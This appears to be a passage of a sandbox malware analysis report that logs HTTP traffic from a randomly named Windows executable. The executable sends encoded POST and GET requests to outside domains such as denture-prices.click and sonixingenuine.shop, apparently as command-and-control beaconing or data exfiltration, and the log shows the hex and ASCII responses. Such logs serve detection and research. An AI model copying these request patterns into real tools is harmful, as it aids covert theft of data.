                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 36 6b 41 30 45 57 59 4a 48 76 49 38 50 44 71 38 5a 79 36 6b 6d 76 2b 72 4d 6b 50 44 58 74 45 72 6b 39 74 32 75 67 4c 43 75 4c 30 52 74 39 70 51 52 48 5a 4b 43 4d 6d 4a 46 68 4d 61 5a 4c 6a 56 48 77 55 7a 73 44 41 56 73 45 77 50 47 64 64 2b 52 44 36 44 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                    Jan 3, 2025 11:42:10.330059052 CET599INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNGNiMzMxYjUtOGE3Ni00OWNjLTkwZTctNDY0MWVmM2YzYjMyIiwicGFnZV90aW1lIjoxNzM1OTAwOT


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    38192.168.2.450040199.59.243.228801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:42:12.427670002 CET775OUTPOST /dx3i/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.denture-prices.click
                                                                    Origin: http://www.denture-prices.click
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 219
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.denture-prices.click/dx3i/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 51 2b 69 53 35 57 69 5a 4f 70 49 6f 2b 32 63 45 65 62 38 66 4a 37 62 45 4a 71 78 78 78 69 44 72 38 6b 5a 35 57 48 45 32 65 67 31 76 5a 72 30 47 42 43 41 52 63 6e 35 73 6c 33 6f 4a 5a 79 6c 37 58 71 72 2f 4d 49 6d 31 6c 48 71 5a 6a 42 4c 53 36 64 64 37 59 6b 44 4f 32 6d 46 71 79 47 4c 58 5a 2f 44 4b 64 4b 55 52 6b 64 30 65 4c 64 42 46 4a 6e 58 56 52 45 49 6a 74 7a 39 62 59 64 42 74 57 66 42 59 2b 49 5a 50 48 63 49 4d 6e 6b 73 31 6f 76 71 6d 62 51 33 46 44 33 2f 48 4d 49 4c 46 44 33 70 51 4d 6d 79 4b 36 58 37 6b 39 4f 33 4d 62 54 36 6a 7a 34 6e 55 71 35 79 65 68 31 78 33 6f 68 4b 79 72 6f 44 4e 35 37 34 6c 61 31 37 32 4f 50 36 46 74 6a 41 3d
                                                                    Data Ascii: 1V=Q+iS5WiZOpIo+2cEeb8fJ7bEJqxxxiDr8kZ5WHE2eg1vZr0GBCARcn5sl3oJZyl7Xqr/MIm1lHqZjBLS6dd7YkDO2mFqyGLXZ/DKdKURkd0eLdBFJnXVREIjtz9bYdBtWfBY+IZPHcIMnks1ovqmbQ3FD3/HMILFD3pQMmyK6X7k9O3MbT6jz4nUq5yeh1x3ohKyroDN574la172OP6FtjA=
                                                                    Jan 3, 2025 11:42:12.888844967 CET1236INHTTP/1.1 200 OK
                                                                    date: Fri, 03 Jan 2025 10:42:12 GMT
                                                                    content-type: text/html; charset=utf-8
                                                                    content-length: 1146
                                                                    x-request-id: 464fec2e-5ea9-4ed8-aa81-5f2691985585
                                                                    cache-control: no-store, max-age=0
                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                    vary: sec-ch-prefers-color-scheme
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==
                                                                    set-cookie: parking_session=464fec2e-5ea9-4ed8-aa81-5f2691985585; expires=Fri, 03 Jan 2025 10:57:12 GMT; path=/
                                                                    connection: close
                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 36 6b 41 30 45 57 59 4a 48 76 49 38 50 44 71 38 5a 79 36 6b 6d 76 2b 72 4d 6b 50 44 58 74 45 72 6b 39 74 32 75 67 4c 43 75 4c 30 52 74 39 70 51 52 48 5a 4b 43 4d 6d 4a 46 68 4d 61 5a 4c 6a 56 48 77 55 7a 73 44 41 56 73 45 77 50 47 64 64 2b 52 44 36 44 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                    Jan 3, 2025 11:42:12.888873100 CET599INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDY0ZmVjMmUtNWVhOS00ZWQ4LWFhODEtNWYyNjkxOTg1NTg1IiwicGFnZV90aW1lIjoxNzM1OTAwOT


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    39192.168.2.450041199.59.243.228801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:42:14.972227097 CET10857OUTPOST /dx3i/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.denture-prices.click
                                                                    Origin: http://www.denture-prices.click
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 10299
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.denture-prices.click/dx3i/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 51 2b 69 53 35 57 69 5a 4f 70 49 6f 2b 32 63 45 65 62 38 66 4a 37 62 45 4a 71 78 78 78 69 44 72 38 6b 5a 35 57 48 45 32 65 67 39 76 5a 61 55 47 54 78 34 52 4f 33 35 73 37 6e 6f 49 5a 79 6b 35 58 71 7a 37 4d 4a 61 4c 6c 45 65 5a 6a 6e 2f 53 71 38 64 37 58 6b 44 4f 35 47 46 72 71 6d 4b 58 5a 2b 76 4f 64 4b 45 52 6b 64 30 65 4c 63 78 46 5a 47 58 56 63 6b 49 67 6b 54 39 66 63 64 42 52 57 66 5a 58 2b 49 73 36 48 74 6f 4d 70 67 49 31 76 63 53 6d 48 41 33 48 51 48 2f 50 4d 50 43 46 44 33 6b 72 4d 6d 76 76 36 58 66 6b 2b 36 43 47 48 44 71 59 77 4c 48 5a 34 5a 43 66 73 43 51 32 71 42 61 39 75 39 53 55 74 4a 6f 30 5a 57 4b 43 58 50 53 6b 2f 6c 50 5a 2f 75 48 59 2b 6c 67 79 77 4a 4f 50 43 6c 52 5a 63 46 61 31 6b 32 4d 57 72 63 38 32 6d 41 35 4d 57 69 6c 41 65 54 52 65 43 67 64 55 6f 42 4c 64 4e 46 48 2f 57 2f 30 31 6d 2b 53 2f 41 31 4e 4e 75 61 53 6e 58 37 68 6f 4e 68 66 6f 33 44 47 39 4e 67 2f 34 73 63 6f 74 48 75 34 44 76 76 34 6d 6d 62 79 55 73 69 36 31 4c 48 69 47 4a 43 5a 6b 76 76 43 4b 32 36 42 [TRUNCATED]
                                                                    Data Ascii: 1V=Q+iS5WiZOpIo+2cEeb8fJ7bEJqxxxiDr8kZ5WHE2eg9vZaUGTx4RO35s7noIZyk5Xqz7MJaLlEeZjn/Sq8d7XkDO5GFrqmKXZ+vOdKERkd0eLcxFZGXVckIgkT9fcdBRWfZX+Is6HtoMpgI1vcSmHA3HQH/PMPCFD3krMmvv6Xfk+6CGHDqYwLHZ4ZCfsCQ2qBa9u9SUtJo0ZWKCXPSk/lPZ/uHY+lgywJOPClRZcFa1k2MWrc82mA5MWilAeTReCgdUoBLdNFH/W/01m+S/A1NNuaSnX7hoNhfo3DG9Ng/4scotHu4Dvv4mmbyUsi61LHiGJCZkvvCK26BtHVsYEnpIEd9YhS51WTl8j0rHvT8MIQsWEjlfkA68+77Py6yH0E/+rAYroPL1PgIHkL0J/JCPu7UjgwOVAo9W+PSQELmXL1ECM6WxbKBiNm9z5WJRMqTIee2CIBCI3z9C7aPvvz/OGsHT5h6Lp9p/0NigdEZFbNcDWSVDZJCkjKxjUsq+PigkudWdkffa1Wwx92z5cB7uqlcyE40GDXpNgKiSB/tR/I7FF3hTXZiUUnZ8zjXFa00SdbIoCqJ7qey87W27HiHINfsQNINf1a/CkAsTm6kn/xv5OIj+stzSsEuvjKFbM6ZwUg6rHsMeTMT52dzreG1VsxT8yml31lQyrfnU6GyVz8XHuHTv8EI/bnwXzu823HNdre06UGaiZHQNufKOKnlM0N2/7VxlGucJAeEpOPZKAERZ29Rmj9O8WoMckp4zinRgaYRMnoagkKcq451Flq92I9tHLyy/IQEBodJtBop7g61ewIMEEU9IbspjVxZ5qfludRJU0j7AaYHnPXmsrP+tVI2sHWa9x+hTN1NRvSL+ZslR4IQ5IxNxC6U2sbTOtG8grSTENSSTT2g49QZaT4hocB7vxVDGO0CBHEVeobPBFLWFrevSXxwFq/XW42bULJrrKxwhqWwcAwCKkY/8iEKrt7CJ/jgorbAr3PQVhiyj56q/v [TRUNCATED]
                                                                    Jan 3, 2025 11:42:15.455962896 CET1236INHTTP/1.1 200 OK
                                                                    date: Fri, 03 Jan 2025 10:42:15 GMT
                                                                    content-type: text/html; charset=utf-8
                                                                    content-length: 1146
                                                                    x-request-id: 6fbf1e8b-7417-442f-8ec0-671e1381fd16
                                                                    cache-control: no-store, max-age=0
                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                    vary: sec-ch-prefers-color-scheme
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==
                                                                    set-cookie: parking_session=6fbf1e8b-7417-442f-8ec0-671e1381fd16; expires=Fri, 03 Jan 2025 10:57:15 GMT; path=/
                                                                    connection: close
                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 36 6b 41 30 45 57 59 4a 48 76 49 38 50 44 71 38 5a 79 36 6b 6d 76 2b 72 4d 6b 50 44 58 74 45 72 6b 39 74 32 75 67 4c 43 75 4c 30 52 74 39 70 51 52 48 5a 4b 43 4d 6d 4a 46 68 4d 61 5a 4c 6a 56 48 77 55 7a 73 44 41 56 73 45 77 50 47 64 64 2b 52 44 36 44 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n6kA0EWYJHvI8PDq8Zy6kmv+rMkPDXtErk9t2ugLCuL0Rt9pQRHZKCMmJFhMaZLjVHwUzsDAVsEwPGdd+RD6Dw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                    Jan 3, 2025 11:42:15.455991983 CET599INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmZiZjFlOGItNzQxNy00NDJmLThlYzAtNjcxZTEzODFmZDE2IiwicGFnZV90aW1lIjoxNzM1OTAwOT


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    40192.168.2.450042199.59.243.228801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:42:17.517158985 CET475OUTGET /dx3i/?1V=d8Ky6hmePKhU2XxFS8oVbq/fBtR8/SXw2U4uZFU2PglJR/EsTh4FCVpvl1B6U0BHfI68a/67nkOplmDPjd8pdEnMsHk7sWiNdLPva59bl5hhAP4TZGe3ZV4=&w0DDw=KH0hz6 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Host: www.denture-prices.click
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:42:18.009480000 CET1236INHTTP/1.1 200 OK
                                                                    date: Fri, 03 Jan 2025 10:42:17 GMT
                                                                    content-type: text/html; charset=utf-8
                                                                    content-length: 1470
                                                                    x-request-id: 80900f2a-3160-4ed3-905e-837fbc1473be
                                                                    cache-control: no-store, max-age=0
                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                    vary: sec-ch-prefers-color-scheme
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ChQqeyFnzfTv8388DewJYhdxCWt8K4UcJrYglAk5daCyjsWBQGaV/uAFSuwDkv0hqSStpTQWxHSB6aH3W1fHaQ==
                                                                    set-cookie: parking_session=80900f2a-3160-4ed3-905e-837fbc1473be; expires=Fri, 03 Jan 2025 10:57:17 GMT; path=/
                                                                    connection: close
                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 68 51 71 65 79 46 6e 7a 66 54 76 38 33 38 38 44 65 77 4a 59 68 64 78 43 57 74 38 4b 34 55 63 4a 72 59 67 6c 41 6b 35 64 61 43 79 6a 73 57 42 51 47 61 56 2f 75 41 46 53 75 77 44 6b 76 30 68 71 53 53 74 70 54 51 57 78 48 53 42 36 61 48 33 57 31 66 48 61 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ChQqeyFnzfTv8388DewJYhdxCWt8K4UcJrYglAk5daCyjsWBQGaV/uAFSuwDkv0hqSStpTQWxHSB6aH3W1fHaQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                    Jan 3, 2025 11:42:18.009495974 CET224INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiODA5MDBmMmEtMzE2MC00ZWQzLTkwNWUtODM3ZmJjMTQ3M2JlIiwicGFnZV9
                                                                    Jan 3, 2025 11:42:18.009505987 CET699INData Raw: 30 61 57 31 6c 49 6a 6f 78 4e 7a 4d 31 4f 54 41 77 4f 54 4d 33 4c 43 4a 77 59 57 64 6c 58 33 56 79 62 43 49 36 49 6d 68 30 64 48 41 36 4c 79 39 33 64 33 63 75 5a 47 56 75 64 48 56 79 5a 53 31 77 63 6d 6c 6a 5a 58 4d 75 59 32 78 70 59 32 73 76 5a
                                                                    Data Ascii: 0aW1lIjoxNzM1OTAwOTM3LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZGVudHVyZS1wcmljZXMuY2xpY2svZHgzaS8/MVY9ZDhLeTZobWVQS2hVMlh4RlM4b1ZicS9mQnRSOC9TWHcyVTR1WkZVMlBnbEpSL0VzVGg0RkNWcHZsMUI2VTBCSGZJNjhhLzY3bmtPcGxtRFBqZDhwZEVuTXNIazdzV2lOZExQdmE1OWJsNWhoQVA0VF


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    41192.168.2.45004313.228.81.39801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:42:23.084750891 CET752OUTPOST /01c7/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.sonixingenuine.shop
                                                                    Origin: http://www.sonixingenuine.shop
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 199
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.sonixingenuine.shop/01c7/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 56 52 4b 41 78 43 58 56 37 43 52 57 4a 78 73 42 5a 6e 4f 58 54 76 59 52 62 58 75 54 32 47 6b 54 53 65 68 4a 69 70 33 32 77 59 6f 6f 58 4e 38 36 69 4b 50 66 74 73 72 77 56 42 67 69 45 52 77 41 2b 4b 4c 44 64 48 2f 42 2f 31 53 75 48 45 64 6a 37 64 35 48 65 46 49 2f 75 77 64 2f 72 31 69 5a 57 70 76 73 78 77 43 72 77 34 54 44 65 6c 37 35 57 45 38 73 47 31 78 6e 56 31 57 30 67 69 75 47 39 74 76 53 67 39 7a 67 2f 54 53 41 57 55 35 38 4d 56 37 76 70 71 59 6c 30 58 2b 6f 65 33 50 57 4e 4e 33 57 33 2b 7a 39 42 75 64 63 73 72 65 72 79 32 76 76 4c 56 73 6f 4f 71 37 33 62 31 64 6f 46 67 3d 3d
                                                                    Data Ascii: 1V=VRKAxCXV7CRWJxsBZnOXTvYRbXuT2GkTSehJip32wYooXN86iKPftsrwVBgiERwA+KLDdH/B/1SuHEdj7d5HeFI/uwd/r1iZWpvsxwCrw4TDel75WE8sG1xnV1W0giuG9tvSg9zg/TSAWU58MV7vpqYl0X+oe3PWNN3W3+z9Budcsrery2vvLVsoOq73b1doFg==
                                                                    Jan 3, 2025 11:42:24.032463074 CET370INHTTP/1.1 301 Moved Permanently
                                                                    Server: openresty
                                                                    Date: Fri, 03 Jan 2025 10:42:23 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Location: https://www.sonixingenuine.shop/01c7/
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    42192.168.2.45004413.228.81.39801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:42:25.678752899 CET772OUTPOST /01c7/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.sonixingenuine.shop
                                                                    Origin: http://www.sonixingenuine.shop
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 219
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.sonixingenuine.shop/01c7/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
